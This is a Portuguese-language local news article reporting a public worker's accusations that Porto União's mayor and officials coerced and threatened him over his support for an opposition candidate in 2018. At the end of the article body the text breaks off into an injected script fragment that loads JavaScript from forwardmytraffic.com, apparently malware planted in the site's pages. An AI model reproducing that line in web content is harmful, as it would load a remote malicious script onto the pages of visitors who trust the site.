InícioDestaquePrefeito de Porto União é acusado de Abuso de poder, Coerção de...

Prefeito de Porto União é acusado de Abuso de poder, Coerção de votos e Ameaça

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio acumulado em R$ 53 milhões

As seis dezenas do concurso 2.738 serão sorteadas, a...

Veja as vagas de empregos disponíveis em Canoinhas e região

O serviço de intermediação de vagas da Prefeitura de...

Equipe de Capoeira de Três Barras participa de competição no Paraná

Neste domingo, 16, a equipe de capoeira do Grupo...

Servidor público contratado por tempo determinado na Prefeitura municipal de Porto União, no ultimo sábado 22/09/2018 o diretor de urbanismo, Marcelo Antonio Veiga, ligou e lhe questionou se estava trabalhando para o candidato à Deputado Estadual, Mauricío Eskudlark, tendo respondido que sim; diante da resposta positiva, pelo fato do referido candidato ser oposição, Marcelo lhe falou que estava demitido, afirmando que ele é um TRAIDOR, que estava traindo o grupo que é formado por lideranças da Prefeitura de Porto União, incluindo o PREFEITO.

 

Que na Segunda-Feira 24/09/2018 se dirigiu até ao RH da Prefeitura, falou com o servidor dinarte e ficor marcada uma reunião com o prefeito naquele mesmo dia, que o chefe de gabinete conhecido como “Pepe“, o levou até o clube 25 de Julho, chegando no local estavam presentes os Secretário de Administração, Rhuan Wolf, o Secretáriode Agricultura conhecido como “Braza“, e o Secretário de Obras, Nei Giacomini, além do prefeito de Porto União, ELISEU MIBACH, que o prefeito questionou oque estava acontecendo e lhe chamou de traidor  isso pelo falto de estar apoiando um partido (PR) que é oposição do partido que o prefeito e as outras pessoas ali apoiam o (PSDB).

 

Naquele momento L.J.R.F se sentiu muito constrangido, pois foi debochado pelas pessoas ali presentes, momento em que o secretário de obras começou a falar mal do deputado, e que o constrangimento durou mais de 40 minutos, após a reunião o prefeito levou até sua casa, juntamente com o chefe de gabinete e o secretário de Administração, que no trajeto até sua casa, o prefeito falava, em tom de de AMEAÇA, que iria achar alguma forma de demitir-lhe e que perdoava se ele continuasse no “grupo” se referindo ao grupo de apoiadores do PSDB. Chegando em sua cassa o prefeito falou, “Deite sua cabeça no travesseiro e pensa no que é bom pra você, amanhã a gente conversa”

 

 

Ainda Afirmou que Marcelo Veiga em um grupo de WhatsApp, ofereceu 20 litro de gasolina aos integrantes do grupo, os quias são todos funcionário do Setor de Urbanismo, e disse “Prefere gasolina ou Emprego”.… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.